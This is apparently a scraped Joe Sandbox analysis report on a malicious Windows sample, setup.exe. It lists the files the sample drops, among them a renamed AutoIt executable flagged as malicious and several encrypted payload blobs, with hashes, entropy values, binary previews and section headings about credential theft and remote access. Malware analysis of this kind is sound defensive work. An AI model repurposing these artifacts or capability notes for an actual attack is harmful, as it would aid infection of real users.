Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.8.8.5.4.3.9.6.0.6.5.4.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.8.8.5.4.3.9.7.5.0.2.9.1.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.e.8.9.2.a.7.-.2.6.a.8.-.4.2.6.f.-.a.c.5.e.-.9.3.6.1.b.f.b.4.c.7.9.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.2.d.5.0.d.8.-.f.4.6.f.-.4.4.6.b.-.b.a.6.d.-.d.7.3.4.e.c.0.6.3.3.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.o.t.i.o.n...c.o.m.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.u.t.o.I.t.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.8.-.e.9.c.6.-.4.3.b.6.e.b.a.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.b.f.a.f.d.c.c.b.4.a.b.1.e.d.3.c.a.a.7.7.5.8.4.1.e.9.a.8.1.1.0.0.0.0.0.9.0.8.!.0.0.0.0.2.6.b.d.b.c.6.3.a.f.8.a.b.a.e.9.a.8.f.b.6.e.c.0.9.1.3.a.3.0.7.e.f.6.6.1.4.c.f.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F5B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 11 14:13:16 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	243012
Entropy (8bit):	1.2426012618638496
Encrypted:	false
SSDEEP:	768:7yevkw7poIAKBUt6HZPzVQfPIw6z9Yzrdp:bkH1t6H3QfwwQsrdp
MD5:	1FD048F965985BAE6251887AD913378F
SHA1:	76F776C634D762D0FFBA7A6810E0D66DEAD1759A
SHA-256:	DE20EAB4DA5DC30F8C5790EB40A7DBCF05563AF1EA3918DC643768CB5A83D39F
SHA-512:	EAA18417D7268B2386D2649B8AD504A02CA7C7DF4C4118C94A01567C765FB05B9A3E4BB2C1C6CA5395646CAACD58408C97DB70C54A3815E5BB63BD1D07D5111F
Malicious:	false
Preview:	MDMP..a..... .......\|#.g......................... ...............)......T...NP..........`.......8...........T............K..li...........)...........+..............................................................................eJ.......,......GenuineIntel............T...........8#.g ............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73C1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6358
Entropy (8bit):	3.727087675132416
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/16zS1sY/EmprC89bqJsftQum:R6lXJd6HYcwqifW
MD5:	F39896D910460072304A89A214657A9B
SHA1:	F727842388C2AAF1AE7DF9C979C6B936AB9DDCEC
SHA-256:	9C275C446D9929912CFDE8FF1B2EF52E08F5E5868CC24FD32EA672E84DC29718
SHA-512:	A7B077224DBE5CC777395768F3782D47ABF22AAC08C95455FA73FF1D6BD449BE899BDF219013F3AEBC93073532018A2CE1E2BC31A3D653C3B5310956A3D93828
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73F1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4667
Entropy (8bit):	4.48532013698672
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg77aI99jCWOa8tqPYm8M4JxD/jFT+q8fzRsR5tlI0V9gd:uIjfZI7rDOlgSJxD1ez6R540V9gd
MD5:	8D6406D5CF289F603052926F1BFB3A95
SHA1:	5E92196810ED409699E7F1F7BCC23AF8908D2742
SHA-256:	82DBBAF2785A5EBE27160DCE875F0BB398C0591BEBD841261BCF0DF29F2F9EC0
SHA-512:	2E07C4BEAF2F9A88C8C3D215DA4A8E9BBB99F158FB4A5FD88889FF693EBD60DEBEF612698973A636AD9D07F02C8F981277DA3BDB1B2F167FBE2708FE51000BED
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="800955" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\826825\Motion.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: hOMr8c96iX.exe, Detection: malicious, Browse Filename: MRVerify.exe, Detection: malicious, Browse Filename: WritingsEye_patched.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse Filename: RevolutionMall.exe, Detection: malicious, Browse Filename: RevolutionMall.exe, Detection: malicious, Browse Filename: adobe_illustrator_2025_v29.4.0_(x64)_pre-cracked_patched.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\826825\g

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	511706
Entropy (8bit):	7.9996491077452
Encrypted:	true
SSDEEP:	12288:FDSLln5gWUl5TYeqRDkpaKMBOUyjg2IeutrA93fNX:FDKKWOT8RDaBMkgpeuCX
MD5:	67DE1C2E8649342C3B50958DA34BDC71
SHA1:	00F409BE9572B0B6F374B885659D1E8167B2F9E5
SHA-256:	91CC6882340B3443CC2BAB874A5E487012F43137AE18B7BD69476F15B611989D
SHA-512:	62BCDADBC74461A49A961328049F28B7E6FBD361FCF6CB31BC809A55CD42AC9EB90FD2A6FAF79BF3172633A3607A74D5621F0D338A298FE5F403E48E1C4CA9EA
Malicious:	false
Preview:	.dr..T..4...K.!...3.G.&.R...%.ZD...4g...!...........FaK.6.)...j\|W.>....0....N..?.W.W..7.....<........'i..?......$t:.e.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.?.'.F...h............._....cDp_....cDpkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....T..,P..Myn.2..t.W.....K...L...#.,_.....?p_....cDpm.........x.5...x..2).U.j....>. #.~......)....A......=.x..s..3.u...._-...+.b9%p.,.._&.V.).k.(....`.>g.D.(.WW ./..w..V.ya.g..S6...@zqtW.L;.#.k...J.HM...H..L...../.?M....K.\l>.n..Xt..I........?...g.s..0W..L.G..5R.O..)&Xh.@._..,D@&...n.`.M........:.g.w\|O....b~.3Q........l...xvN...3i.j....B.]s.~/_.-...L...W....J...@......\|.V.9S...).e...R...[.U2...x.z.8.

C:\Users\user\AppData\Local\Temp\Defend

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	5.533673026975329
Encrypted:	false
SSDEEP:	1536:iAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xd:JhxjgarB/5elDWy4ZNoGmROL7v
MD5:	43E03BEEAFF51333CA821DA9138B2671
SHA1:	94597DA11A70C1EBBC510EBCB4FAB4F16EDB4D2F
SHA-256:	FAD1470B1AC2D9AEE2443346E1B727B889FED8CED9690AD9594C63AF62E0FD08
SHA-512:	5804FFA965295C5B75BFD9E0A5B66A71C03118405F2980F08FB92333F18747FF2210BB179FA0E3A92E87C7FE1156628E8AD43FD898D6662E6BEF9B9004A54CA3
Malicious:	false
Preview:	.R.O.R.....E.r.r.o.r.:. .....%.s. .(.%.d.). .:. .=.=.>. .%.s.:. ...%.s. ...%.s.......R.u.n. .S.c.r.i.p.t.:...........A.u.t.o.I.t. .s.c.r.i.p.t. .f.i.l.e.s. .(....a.u.3.,. ....a.3.x.)......a.u.3.;....a.3.x...A.l.l. .f.i.l.e.s. .(.....)...........a.u.3...#.i.n.c.l.u.d.e. .d.e.p.t.h. .e.x.c.e.e.d.e.d... . .M.a.k.e. .s.u.r.e. .t.h.e.r.e. .a.r.e. .n.o. .r.e.c.u.r.s.i.v.e. .i.n.c.l.u.d.e.s...E.r.r.o.r. .o.p.e.n.i.n.g. .t.h.e. .f.i.l.e.....>.>.>.A.U.T.O.I.T. .S.C.R.I.P.T.<.<.<...B.a.d. .d.i.r.e.c.t.i.v.e. .s.y.n.t.a.x. .e.r.r.o.r.....U.n.t.e.r.m.i.n.a.t.e.d. .s.t.r.i.n.g...C.a.n.n.o.t. .p.a.r.s.e. .#.i.n.c.l.u.d.e...U.n.t.e.r.m.i.n.a.t.e.d. .g.r.o.u.p. .o.f. .c.o.m.m.e.n.t.s.....O.N.....O.F.F...0.%.d...%.d.....S.h.e.l.l._.T.r.a.y.W.n.d...R.E.M.O.V.E.....K.E.Y.S.....E.X.I.S.T.S.....A.P.P.E.N.D.....b.l.a.n.k...i.n.f.o.....q.u.e.s.t.i.o.n.....s.t.o.p.....w.a.r.n.i.n.g.....L.i.n.e. .%.d.:. .....B.U.T.T.O.N.....#.3.2.7.7.0.....\.\.?.\.....\.\.?.\.U.N.C.\.....\.\...\.....S.t.r.i.n.g.F.i.l.e

C:\Users\user\AppData\Local\Temp\Diabetes

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	firmware 5fc vf24c (revision 131072) \307\005\334\362L V2, version 26311.1320.62284 (region 13042944), 485706752 bytes or less, UNKNOWN1 0xc70500, UNKNOWN2 0xc70508f3, UNKNOWN3 0xc70518f3, at 0 3339002099 bytes , at 0x4c000000 50949 bytes , at 0x24f34c00 16777216 bytes
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	6.53859855336367
Encrypted:	false
SSDEEP:	3072:HxyA3laW2UDQWf05mjccBiqXvpgF4qv+3t:hloUDtf0accB3gBmd
MD5:	2C17B85839988F292C1E7939D5714551
SHA1:	4E3465E6B78924648B619A0DC6F7BA38C3273165
SHA-256:	5700FC8D509911D2DDC87690EC2DCF39279745BBF8FFEC141ADD175F9F4B2ED1
SHA-512:	1D46EEC9C7DE8C7E8988D381D94A0BBF0F17974E0A9FA2F199A9637066257443D3826C26935B2C959F4F30D34022CA098A7983DADDDBF6A0CBC5ECE30CF60F0D
Malicious:	false
Preview:	........L.....f....L.......L...I.....L..G.....L.........L.........L.........L.....f....L.......L...J.....L...G.....L.........L....... .L.......$.L.....f..(.L.....,.L...I...8.L..G...<.L.......@.L.......D.L.......H.L.....f..L.L.....P.L...J...\.L.Q.G...`.L.......d.L.......h.L.......l.L.....f..p.L.....t.L.P.I.....L...G.....L.........L.........L.........L.....f....L.......L.\.I.....L..G.....L.........L.........L.........L.....f....L.......L...I.....L...G.....L.........L.........L.........L.....f....L.......L...I.....L...@.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L.........L....... .L.....f..$.L.....(.L...I...4.L.l.G...8.L.......<.L.......@.L.......D.L.....f..H.L.....L.L...J...X.L..G...\.L.......`.L.......d.L.......h.L.....f..l.L.....p.L...J...\|.L...G.....L.........L.........L.........L.....f....L.......L.(.J.....L.2.G.....L.........L.........L.........L.....f....L.......L...I.....L.{.A.....L.........L.........L.........L.....f....L.......L...I..

C:\Users\user\AppData\Local\Temp\Elephant

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.4328862483245475
Encrypted:	false
SSDEEP:	1536:I1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdV:IZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/L
MD5:	08041B8B47EDAD9C296F1844092C0945
SHA1:	377AE65E8BC4F304B999A7AF84193C75A37693A8
SHA-256:	01C64D190E9F6589E74EBDEA1FCE8F1FB6C5E6D78C991FE846268D5263BAF15B
SHA-512:	68C6BFB4F776FFD2DC26D3FC3C8C91DBFED3BA000646176CAAC5E08E19FE56E1D60A7D7EC9FBD48098326AC70A1F2A18179AA896C7CC5980F09F8C3CDB8E71AF
Malicious:	false
Preview:	F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV.............

C:\Users\user\AppData\Local\Temp\Error.vob

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.997244305060945
Encrypted:	true
SSDEEP:	1536:u3mYNam/rK/7nJUHNV3sAPvTKx9B2mdoU8iazWZFU5OcauAIQeJKWKCu:UmZIeuHNV39vA97uU8lwU1auA/VWKD
MD5:	1A4003C27730BAF66598B49E51EA3F91
SHA1:	DB047A61C5485431BD1D0FA1551B2BFC84B0A67C
SHA-256:	5C5BC2CC64DF127288E94F30B22077B929683C6A19D22E0E24CD41D53D935D24
SHA-512:	8DE7B9347F59CFB18E5BF207DDE741723E8B4D932F1B77C05E07DBC279CA4F83E296398BE95AE294CF486F32C7416858A088F64AAE47C4E9D0A06285CFB3EDC2
Malicious:	false
Preview:	.KS...........IF..z..f\i'..Ll=s.i...nM.Y.....z....UQ.x.l.x.y...9[..vJ..8....7x.L.).4+X..... 8..9.Ox:w.....TH.....8z.7.....\|.uO'......MJ.....5.!..$+Dl.....s....Hv.....>vA....7'~.V..T[W.W....HG>.j....d......_(S.X.{..y..O".\MAj..w...A.X.....g..jO.O....2....H...3.}\og...+..F..C30.l.k..A.v.T;..Th...UI...A...W..c,...u..I.<........H?.[g>..".V..O...^y.k=..O .......3......../%...h.........vK.....'_...+...q.Y.5..e....U1%.l~8k.yc...]d.....Q.....v.N....-yV.RnN..o..k.......7O..?.1@..dF.M.W ..T.5.:..Tw,......D{...v.Q.0.Sh3A !.{..@.T..4x\|]);<..z...{&{lcs.....v....7......7I/..C(T.w..Z.7,.N.~..x....i.......hS.6Bhm.......A.i......./.R....,Y;....!....?R.>-..[X...9.E$~...(.v...0..@z.$...P..Q1...2..DT.vw.J.ga..q.........)...,..S....'......}tw....c.H.^_....L..T...l.._Fa.G.{....,...bY7M.b..t..DN......s..?.l..\%.....D/.XC..#M..8R.).......z...m.....}....GAy.p..Q7..Z7q.j....C^O..f.,Z..%.......k)....A..?v.o.^..T....\..8..CE..](@..<+p.O+.%LB........

C:\Users\user\AppData\Local\Temp\Examples.vob

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.997810959567772
Encrypted:	true
SSDEEP:	1536:My3L5kbcdyTfEfRyIc/fd00y0bKmxzIKjwWkIqpot4PGUY1q57hl46sazL1q9bDh:MmL2bcdyTfCRyc0y0bKezRqpoDUYk7q7
MD5:	5578CFF57B76E79D7068FED590C7B023
SHA1:	434C93705F4EBB05583C75474B3316AF6EDCA3E4
SHA-256:	E3AF5B1B97C67EFDAD0EE06D40FC58E01BA6D0EC360C27DEB02EEF4E0D6BD0D4
SHA-512:	CC289E9E981B00E9DC7B5F69B506DB7120E89AA28E8831CE08F08CFC2C6B14EFE62C7F69DA1B0F9588F920FEBAA0D95CE9BFB6578361038A89B54F82CF9FD40B
Malicious:	false
Preview:	.x...NK]...u.).u.C..r...T.y.C.:A........Ox.m,L....C{.V :VwW4...7'.y1...K...._..P..m.d@.<%l....K....f...'..".`.O......:NA.'r.(..p^Q`+.r....".\.}K......VC1a....7.1..y.D.".<.Q,....7..._.-......B..b.yeL~....g..A4.y........`](...............Q.E.{.....5S\..O..$/..b.u..w........H"^.N&od.'...19.S..9...Z..A.R.....y~....)W..4a.f[.4.&.n.... ...'..\...P=).f.@N.A..>.....e........e.l>n.!y...8...}....h.0..\|..SP.....Y....n..#..../..:e.PU3L.8mV.2.=.......K........../...N.e..xm.....s4.M.....+.X...&Ub.u....E.(.....p5e.."V1v._n.u....Q.Ni.YZ..m/...../....@.....o..(g....DE9k.P8.....Z...o.arq8Y#.["...)..q0C.\r#.W.]..=y..y.'.....L..n*.nDd.n..G.o. ,..+}$.un...f!..F..k[8...D?n...S....yd...[.67..X............]....@...W..,...m.X6....x.i..JI..b0....@!....m.[...6.7...u..B.....a_..N..y.........^...(.%\>......k..}.6....f..k...=.0..1=.2.fe...f...g._D:J.&.E:.3.F..C.j.[.p.........U.z9t....5/h....a=7...?......-.M.{...C..T.....'..H_...T...tAG.x...D.....0....].f.pq...tJ..2.

C:\Users\user\AppData\Local\Temp\Fake.vob

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	7.998015532785626
Encrypted:	true
SSDEEP:	1536:+XtB+GotRy6+BpTLTwhm8fbSdEI7ln0/Ah74esiGyfbWvgCNuYKryHqTxdgUF:UunytpnUhm8fbSdEI7lnGI74emEb0uYa
MD5:	9EAEED21E68E554A02448B0580D32922
SHA1:	E528EC2669D6168311C13FFA19D8C86DFDDFD5C2
SHA-256:	4033C871A980C0A902A35C71F7D30CAA276545811BCB0ED63888841781E2F692
SHA-512:	5FAB574676F927600C63A0C6E982EC4E809F2C007057F093636E895783C1258325F11BB070594F89BAAAFEFF67F8AAAC4A2C34E74B40AF14EDA584D0F1740435
Malicious:	false
Preview:	.dr..T..4...K.!...3.G.&.R...%.ZD...4g...!...........FaK.6.)...j\|W.>....0....N..?.W.W..7.....<........'i..?......$t:.e.....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....2.?.'.F...h............._....cDp_....cDpkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....T..,P..Myn.2..t.W.....K...L...#.,_.....?p_....cDpm.........x.5...x..2).U.j....>. #.~......)....A......=.x..s..3.u...._-...+.b9%p.,.._&.V.).k.(....`.>g.D.(.WW ./..w..V.ya.g..S6...@zqtW.L;.#.k...J.HM...H..L...../.?M....K.\l>.n..Xt..I........?...g.s..0W..L.G..5R.O..)&Xh.@._..,D@&...n.`.M........:.g.w\|O....b~.3Q........l...xvN...3i.j....B.]s.~/_.-...L...W....J...@......\|.V.9S...).e...R...[.U2...x.z.8.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Motion.com_b5bd9c28267194a9d4fcabdf4ffd497ade3aad87_7e051296_43e892a7-26a8-426f-ac5e-9361bfb4c797\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F5B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73C1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73F1.tmp.xml

C:\Users\user\AppData\Local\Temp\826825\Motion.com

C:\Users\user\AppData\Local\Temp\826825\g

C:\Users\user\AppData\Local\Temp\Defend

C:\Users\user\AppData\Local\Temp\Diabetes

C:\Users\user\AppData\Local\Temp\Elephant

C:\Users\user\AppData\Local\Temp\Error.vob

C:\Users\user\AppData\Local\Temp\Examples.vob

C:\Users\user\AppData\Local\Temp\Fake.vob

C:\Users\user\AppData\Local\Temp\Girl.vob

Windows Analysis Report
setup.exe